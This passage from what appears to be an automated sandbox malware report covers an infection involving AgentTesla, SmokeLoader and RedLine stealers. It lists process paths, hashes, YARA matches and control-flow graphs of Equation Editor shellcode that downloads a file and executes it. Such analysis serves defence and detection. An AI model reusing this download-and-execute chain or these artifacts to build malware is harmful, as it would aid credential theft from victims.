                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.1148519214.0000000002216000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000F.00000002.1148519214.0000000002216000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.1153618394.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.1153618394.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000F.00000002.1153618394.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.1155901803.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.1155901803.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000F.00000002.1155901803.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                Reputation:low

                                                                                Target ID:16
                                                                                Start time:05:09:17
                                                                                Start date:22/11/2022
                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                Imagebase:0x5d0000
                                                                                File size:2972672 bytes
                                                                                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000010.00000000.1030255101.0000000000190000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:high

                                                                                Target ID:17
                                                                                Start time:05:09:19
                                                                                Start date:22/11/2022
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\explorer.exe
                                                                                Imagebase:0xff040000
                                                                                File size:3229696 bytes
                                                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Target ID:18
                                                                                Start time:05:09:20
                                                                                Start date:22/11/2022
                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                Imagebase:0x5d0000
                                                                                File size:2972672 bytes
                                                                                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000012.00000000.1036314338.00000000000D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:high

                                                                                Target ID:19
                                                                                Start time:05:09:21
                                                                                Start date:22/11/2022
                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                Imagebase:0x5d0000
                                                                                File size:2972672 bytes
                                                                                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000013.00000002.1191957293.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000013.00000000.1039506487.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:high

                                                                                Target ID:20
                                                                                Start time:05:09:23
                                                                                Start date:22/11/2022
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\explorer.exe
                                                                                Imagebase:0xff040000
                                                                                File size:3229696 bytes
                                                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000014.00000002.1192013184.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                Target ID:21
                                                                                Start time:05:09:24
                                                                                Start date:22/11/2022
                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                Imagebase:0x5d0000
                                                                                File size:2972672 bytes
                                                                                MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000015.00000000.1045681304.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                                                                Target ID:22
                                                                                Start time:05:09:26
                                                                                Start date:22/11/2022
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\explorer.exe
                                                                                Imagebase:0xff040000
                                                                                File size:3229696 bytes
                                                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language

                                                                                Target ID:23
                                                                                Start time:05:09:32
                                                                                Start date:22/11/2022
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwAwAA==
                                                                                Imagebase:0x21a50000
                                                                                File size:452608 bytes
                                                                                MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET

                                                                                Target ID:25
                                                                                Start time:05:10:03
                                                                                Start date:22/11/2022
                                                                                Path:C:\Users\user\AppData\Roaming\efbhiii
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\efbhiii
                                                                                Imagebase:0x400000
                                                                                File size:192000 bytes
                                                                                MD5 hash:FCAA733B76E66945EF88308FD504C0DC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.1137718411.0000000000668000.00000040.00000020.00020000.00000000.sdmp, Author: unknown

                                                                                Target ID:26
                                                                                Start time:05:10:05
                                                                                Start date:22/11/2022
                                                                                Path:C:\Users\user\AppData\Roaming\efbhiii
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\efbhiii
                                                                                Imagebase:0x400000
                                                                                File size:192000 bytes
                                                                                MD5 hash:FCAA733B76E66945EF88308FD504C0DC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001A.00000002.1148403821.0000000000341000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001A.00000002.1148403821.0000000000341000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001A.00000002.1148349455.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001A.00000002.1148349455.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: unknown

                                                                                Target ID:27
                                                                                Start time:05:10:10
                                                                                Start date:22/11/2022
                                                                                Path:C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                Imagebase:0x1a0000
                                                                                File size:123904 bytes
                                                                                MD5 hash:2E1406B0FA96C7F11EA16768E01B2FD1
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.1196460854.0000000002167000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.1197973871.0000000002245000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000000.1142718218.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001B.00000000.1142718218.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000001B.00000000.1142718218.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

                                                                                Target ID:29
                                                                                Start time:05:10:16
                                                                                Start date:22/11/2022
                                                                                Path:C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exe"
                                                                                Imagebase:0xc00000
                                                                                File size:123904 bytes
                                                                                MD5 hash:2E1406B0FA96C7F11EA16768E01B2FD1
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:28.1%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:89.7%
                                                                                  Total number of Nodes:97
                                                                                  Total number of Limit Nodes:3
                                                                                  execution_graph 383 3760627 GetPEB 384 3760635 383->384 445 37604b3 ExitProcess 466 37604cc 445->466 448 3760521 467 37604d2 466->467 492 37604e8 467->492 469 3760521 471 376050f 15 API calls 472 37604f5 471->472 473 3760568 472->473 479 3760509 472->479 475 37605cd 8 API calls 473->475 484 37605d6 473->484 474 37605fb 3 API calls 476 37605ed 474->476 477 3760589 URLDownloadToFileW 475->477 478 37605f5 ShellExecuteW 476->478 485 37604bf 476->485 482 37605e6 5 API calls 477->482 481 3760620 ExitProcess 478->481 512 3760549 479->512 486 3760614 481->486 482->484 484->474 485->448 488 376050f 485->488 486->485 487 3760623 ExitProcess 486->487 489 3760512 488->489 490 3760549 15 API calls 489->490 491 3760521 490->491 493 37604ee 492->493 494 376050f 15 API calls 493->494 498 37604f5 493->498 494->498 495 3760568 496 37605d6 495->496 499 37605cd 8 API calls 495->499 497 37605fb 3 API calls 496->497 500 37605ed 497->500 498->495 503 3760509 498->503 501 3760589 URLDownloadToFileW 499->501 502 37605f5 ShellExecuteW 500->502 508 37604d9 500->508 506 37605e6 5 API calls 501->506 505 3760620 ExitProcess 502->505 507 3760549 15 API calls 503->507 509 3760614 505->509 506->496 510 3760521 507->510 508->469 508->471 509->508 511 3760623 ExitProcess 509->511 513 376054b 512->513 514 376055e 15 API calls 513->514 515 3760550 514->515 385 3760549 386 376054b 385->386 389 376055e LoadLibraryW 386->389 404 3760578 389->404 392 37605d6 437 37605fb 392->437 397 37605f5 ShellExecuteW 443 3760620 397->443 401 3760550 402 3760614 402->401 403 3760623 ExitProcess 402->403 405 376057b 404->405 406 37605cd 8 API calls 405->406 407 3760589 URLDownloadToFileW 406->407 409 37605e6 5 API calls 407->409 410 37605d6 409->410 411 37605fb 3 API calls 410->411 412 37605ed 411->412 413 37605f5 ShellExecuteW 412->413 415 3760565 412->415 414 3760620 ExitProcess 413->414 416 3760614 414->416 415->392 418 37605cd URLDownloadToFileW 415->418 416->415 417 3760623 ExitProcess 416->417 419 37605d6 418->419 420 37605e6 5 API calls 418->420 421 37605fb 3 API calls 419->421 420->419 422 37605ed 421->422 423 37605f5 ShellExecuteW 422->423 425 3760589 URLDownloadToFileW 422->425 424 3760620 ExitProcess 423->424 426 3760614 424->426 428 37605e6 425->428 426->425 427 3760623 ExitProcess 426->427 429 37605e8 428->429 430 37605ed 429->430 431 37605fb 3 API calls 429->431 432 37605f5 ShellExecuteW 430->432 434 376065a 430->434 431->430 433 3760620 ExitProcess 432->433 435 3760614 433->435 434->392 435->434 436 3760623 ExitProcess 435->436 438 37605fe ShellExecuteW 437->438 439 3760620 ExitProcess 438->439 440 3760614 438->440 439->440 441 37605ed 440->441 442 3760623 ExitProcess 440->442 441->397 441->401 444 3760623 ExitProcess 443->444

                                                                                  Callgraph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  • Opacity -> Relevance
                                                                                  • Disassembly available
                                                                                  callgraph 0 Function_03760056 1 Function_03760252 2 Function_037604B3 5 Function_037605FB 2->5 7 Function_037605E6 2->7 9 Function_03760620 2->9 13 Function_0376050F 2->13 14 Function_037604CC 2->14 15 Function_037605CD 2->15 17 Function_03760549 2->17 3 Function_037600B0 4 Function_0376055E 4->5 6 Function_03760578 4->6 4->7 4->9 4->15 5->9 6->5 6->7 6->9 6->15 7->5 7->9 8 Function_03760627 12 Function_0376064F 8->12 10 Function_037606A0 11 Function_03760000 13->17 14->5 14->7 14->9 14->10 14->13 14->15 16 Function_037604E8 14->16 14->17 15->5 15->7 15->9 16->5 16->7 16->9 16->10 16->13 16->15 16->17 17->4

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 376055e-376056a LoadLibraryW call 3760578 4 376056c-37605d1 call 37605cd URLDownloadToFileW call 37605e6 0->4 5 37605da-37605f3 call 37605fb 0->5 23 37605d6-37605d8 4->23 11 37605f5-3760615 ShellExecuteW call 3760620 5->11 12 376065a-3760666 5->12 24 3760617 11->24 25 3760680-3760684 11->25 15 3760669 12->15 16 3760671-3760675 15->16 17 376066b-376066f 15->17 21 3760677-376067b 16->21 22 376068a-376068c 16->22 17->16 20 376067d 17->20 20->25 21->20 21->22 29 376069c-376069d 22->29 23->5 24->15 30 3760619 24->30 26 3760686 25->26 27 3760688 25->27 26->22 27->22 31 376068e-3760697 27->31 30->22 32 376061b-3760625 ExitProcess 30->32 35 3760660-3760663 31->35 36 3760699 31->36 35->31 38 3760665 35->38 36->29 38->15
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(03760550), ref: 0376055E
                                                                                    • Part of subcall function 03760578: URLDownloadToFileW.URLMON(00000000,03760589,?,00000000,00000000), ref: 037605CF
                                                                                    • Part of subcall function 03760578: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0376060D
                                                                                    • Part of subcall function 03760578: ExitProcess.KERNEL32(00000000), ref: 03760625
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.922891952.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_3760000_EQNEDT32.jbxd
                                                                                  Similarity
                                                                                  • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                                                  • String ID:
                                                                                  • API String ID: 2508257586-0
                                                                                  • Opcode ID: 9c06e32880fc059e6859fb1ca08188846269bba3ade8855abebcd944d358ceda
                                                                                  • Instruction ID: 9a5cc2ac68d9f9e83c3e91e4f6377bcbfc7f2c127d8278da50b1f3f0370484de
                                                                                  • Opcode Fuzzy Hash: 9c06e32880fc059e6859fb1ca08188846269bba3ade8855abebcd944d358ceda
                                                                                  • Instruction Fuzzy Hash: 712137A284D3C26FDB1397700C7EB55BF646F63204F5948CEE8C2494E3E6985501CB67
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 39 37604cc-37604da call 37606a0 call 37604e8 44 376052d-3760548 39->44 45 37604dd-37604e2 39->45 50 376054a-376055c 44->50 49 37604e5-37604f6 call 376050f 45->49 45->50 55 3760568-376056a 49->55 56 37604f8-37604fd 49->56 58 376056c-3760573 55->58 59 37605da-37605f3 call 37605fb 55->59 56->55 57 37604ff-3760507 56->57 60 376057b-37605d8 call 37605cd URLDownloadToFileW call 37605e6 57->60 69 3760509-376052a call 3760549 57->69 58->60 67 37605f5-3760615 ShellExecuteW call 3760620 59->67 68 376065a-3760666 59->68 60->59 83 3760617 67->83 84 3760680-3760684 67->84 72 3760669 68->72 69->44 73 3760671-3760675 72->73 74 376066b-376066f 72->74 79 3760677-376067b 73->79 80 376068a-376068c 73->80 74->73 78 376067d 74->78 78->84 79->78 79->80 89 376069c-376069d 80->89 83->72 90 3760619 83->90 86 3760686 84->86 87 3760688 84->87 86->80 87->80 91 376068e-3760697 87->91 90->80 92 376061b-3760625 ExitProcess 90->92 95 3760660-3760663 91->95 96 3760699 91->96 95->91 98 3760665 95->98 96->89 98->72
                                                                                  APIs
                                                                                  • URLDownloadToFileW.URLMON(00000000,03760589,?,00000000,00000000), ref: 037605CF
                                                                                  • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0376060D
                                                                                  • ExitProcess.KERNEL32(00000000), ref: 03760625
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.922891952.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_3760000_EQNEDT32.jbxd
                                                                                  Similarity
                                                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                                                  • String ID:
                                                                                  • API String ID: 3584569557-0
                                                                                  • Opcode ID: d3df0695b547182fe153945df79e2c92940450a7b0503da5c3972861bd0beb5b
                                                                                  • Instruction ID: d673fb10c5b50ea6aa116b485f748cb794ec100378a1d5dbba59ec821e813662
                                                                                  • Opcode Fuzzy Hash: d3df0695b547182fe153945df79e2c92940450a7b0503da5c3972861bd0beb5b
                                                                                  • Instruction Fuzzy Hash: F94166A684D3C16FD713D7300D7EB95BF246F63200F5D8ACF98C24A0A3E6989A05C366
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 99 37604e8 100 37604ee 99->100 101 37604e9 call 37606a0 99->101 102 37604f5-37604f6 100->102 103 37604f0 call 376050f 100->103 101->100 104 3760568-376056a 102->104 105 37604f8-37604fd 102->105 103->102 107 376056c-3760573 104->107 108 37605da-37605f3 call 37605fb 104->108 105->104 106 37604ff-3760507 105->106 109 376057b-37605d8 call 37605cd URLDownloadToFileW call 37605e6 106->109 118 3760509-376055c call 3760549 106->118 107->109 116 37605f5-3760615 ShellExecuteW call 3760620 108->116 117 376065a-3760666 108->117 109->108 132 3760617 116->132 133 3760680-3760684 116->133 121 3760669 117->121 122 3760671-3760675 121->122 123 376066b-376066f 121->123 128 3760677-376067b 122->128 129 376068a-376068c 122->129 123->122 127 376067d 123->127 127->133 128->127 128->129 138 376069c-376069d 129->138 132->121 139 3760619 132->139 135 3760686 133->135 136 3760688 133->136 135->129 136->129 141 376068e-3760697 136->141 139->129 142 376061b-3760625 ExitProcess 139->142 147 3760660-3760663 141->147 148 3760699 141->148 147->141 151 3760665 147->151 148->138 151->121
                                                                                  APIs
                                                                                  • URLDownloadToFileW.URLMON(00000000,03760589,?,00000000,00000000), ref: 037605CF
                                                                                  • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0376060D
                                                                                  • ExitProcess.KERNEL32(00000000), ref: 03760625
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.922891952.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_3760000_EQNEDT32.jbxd
                                                                                  Similarity
                                                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                                                  • String ID:
                                                                                  • API String ID: 3584569557-0
                                                                                  • Opcode ID: 895929aa9b7e58198d139f57ecf33ab051d54b8d6015e854f548f4cfd66bb6fc
                                                                                  • Instruction ID: 8b352635b8388bab74a5bb5cfe77c184e5aef44fbe2925ef63e36a4a87836e39
                                                                                  • Opcode Fuzzy Hash: 895929aa9b7e58198d139f57ecf33ab051d54b8d6015e854f548f4cfd66bb6fc
                                                                                  • Instruction Fuzzy Hash: 4D4187A684D3C16FD71397300D7EB95BF646B63200F5C89CF98C24A4A3E6989605C767
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 153 3760578-37605f3 call 37605cd URLDownloadToFileW call 37605e6 call 37605fb 164 37605f5-3760615 ShellExecuteW call 3760620 153->164 165 376065a-3760666 153->165 174 3760617 164->174 175 3760680-3760684 164->175 167 3760669 165->167 168 3760671-3760675 167->168 169 376066b-376066f 167->169 172 3760677-376067b 168->172 173 376068a-376068c 168->173 169->168 171 376067d 169->171 171->175 172->171 172->173 178 376069c-376069d 173->178 174->167 179 3760619 174->179 176 3760686 175->176 177 3760688 175->177 176->173 177->173 180 376068e-3760697 177->180 179->173 181 376061b-3760625 ExitProcess 179->181 184 3760660-3760663 180->184 185 3760699 180->185 184->180 187 3760665 184->187 185->178 187->167
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.922891952.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_3760000_EQNEDT32.jbxd
                                                                                  Similarity
                                                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                                                  • String ID:
                                                                                  • API String ID: 3584569557-0
                                                                                  • Opcode ID: 750903ec5bb79bb5e725082de897b65ac65f4d5a09a08d4178d27afdacae32eb
                                                                                  • Instruction ID: b1afc185970842ea94a50b79c8d86f6381eaa35125eec1ca5d7c51589294734a
                                                                                  • Opcode Fuzzy Hash: 750903ec5bb79bb5e725082de897b65ac65f4d5a09a08d4178d27afdacae32eb
                                                                                  • Instruction Fuzzy Hash: 942137A284D3C26EDB139B700C7DB55BF645F63204F5948CEE4C24D4E3E6984400C727
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 188 37605cd-37605cf URLDownloadToFileW 189 37605d6-37605f3 call 37605fb 188->189 190 37605d1 call 37605e6 188->190 195 37605f5-3760615 ShellExecuteW call 3760620 189->195 196 376065a-3760666 189->196 190->189 205 3760617 195->205 206 3760680-3760684 195->206 198 3760669 196->198 199 3760671-3760675 198->199 200 376066b-376066f 198->200 203 3760677-376067b 199->203 204 376068a-376068c 199->204 200->199 202 376067d 200->202 202->206 203->202 203->204 209 376069c-376069d 204->209 205->198 210 3760619 205->210 207 3760686 206->207 208 3760688 206->208 207->204 208->204 211 376068e-3760697 208->211 210->204 212 376061b-3760625 ExitProcess 210->212 215 3760660-3760663 211->215 216 3760699 211->216 215->211 218 3760665 215->218 216->209 218->198
                                                                                  APIs
                                                                                  • URLDownloadToFileW.URLMON(00000000,03760589,?,00000000,00000000), ref: 037605CF
                                                                                    • Part of subcall function 037605E6: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0376060D
                                                                                    • Part of subcall function 037605E6: ExitProcess.KERNEL32(00000000), ref: 03760625
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.922891952.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_3760000_EQNEDT32.jbxd
                                                                                  Similarity
                                                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                                                  • String ID:
                                                                                  • API String ID: 3584569557-0
                                                                                  • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                                  • Instruction ID: cc3b94da9c0bb1072b7c40cd6667b3e92a9bddec30f9eab3613cf35feae14630
                                                                                  • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                                  • Instruction Fuzzy Hash: FDF027B058C34079F712EB740C7EF6A6E14AFC1700F540889BD515D0D3D8C48800872A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 219 37605fb-376060d ShellExecuteW 221 3760614-3760615 219->221 222 376060f call 3760620 219->222 223 3760617 221->223 224 3760680-3760684 221->224 222->221 227 3760669 223->227 228 3760619 223->228 225 3760686 224->225 226 3760688 224->226 231 376068a-376068c 225->231 226->231 232 376068e-3760697 226->232 229 3760671-3760675 227->229 230 376066b-376066f 227->230 228->231 233 376061b-3760625 ExitProcess 228->233 229->231 236 3760677-376067b 229->236 230->229 235 376067d 230->235 237 376069c-376069d 231->237 239 3760660-3760663 232->239 240 3760699 232->240 235->224 236->231 236->235 239->232 242 3760665 239->242 240->237 242->227
                                                                                  APIs
                                                                                  • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0376060D
                                                                                    • Part of subcall function 03760620: ExitProcess.KERNEL32(00000000), ref: 03760625
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.922891952.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_3760000_EQNEDT32.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteExitProcessShell
                                                                                  • String ID:
                                                                                  • API String ID: 1124553745-0
                                                                                  • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                                  • Instruction ID: 9f3f96d7cca73a82c6da277761219ccce404bdc39e436de6c91bed7484e88cbb
                                                                                  • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                                  • Instruction Fuzzy Hash: 8A01F97995C343A5EB30E6684C39BB9AB15DBC1710FCD4947AD80484C6D59494C39A3E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 243 37605e6-37605e8 245 37605ed-37605f3 243->245 246 37605e8 call 37605fb 243->246 247 37605f5-3760615 ShellExecuteW call 3760620 245->247 248 376065a-3760666 245->248 246->245 257 3760617 247->257 258 3760680-3760684 247->258 250 3760669 248->250 251 3760671-3760675 250->251 252 376066b-376066f 250->252 255 3760677-376067b 251->255 256 376068a-376068c 251->256 252->251 254 376067d 252->254 254->258 255->254 255->256 261 376069c-376069d 256->261 257->250 262 3760619 257->262 259 3760686 258->259 260 3760688 258->260 259->256 260->256 263 376068e-3760697 260->263 262->256 264 376061b-3760625 ExitProcess 262->264 267 3760660-3760663 263->267 268 3760699 263->268 267->263 270 3760665 267->270 268->261 270->250
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.922891952.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_3760000_EQNEDT32.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteExitProcessShell
                                                                                  • String ID:
                                                                                  • API String ID: 1124553745-0
                                                                                  • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                                  • Instruction ID: bd0d1e30cb9ed294fa9d9d393a73c811e0353340ed96760c243378b4b1114a69
                                                                                  • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                                  • Instruction Fuzzy Hash: 0C01283454C302B5F761E7784CBDBAEAA95EBC1714F98885AFD90480D6D2C48983CA3E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
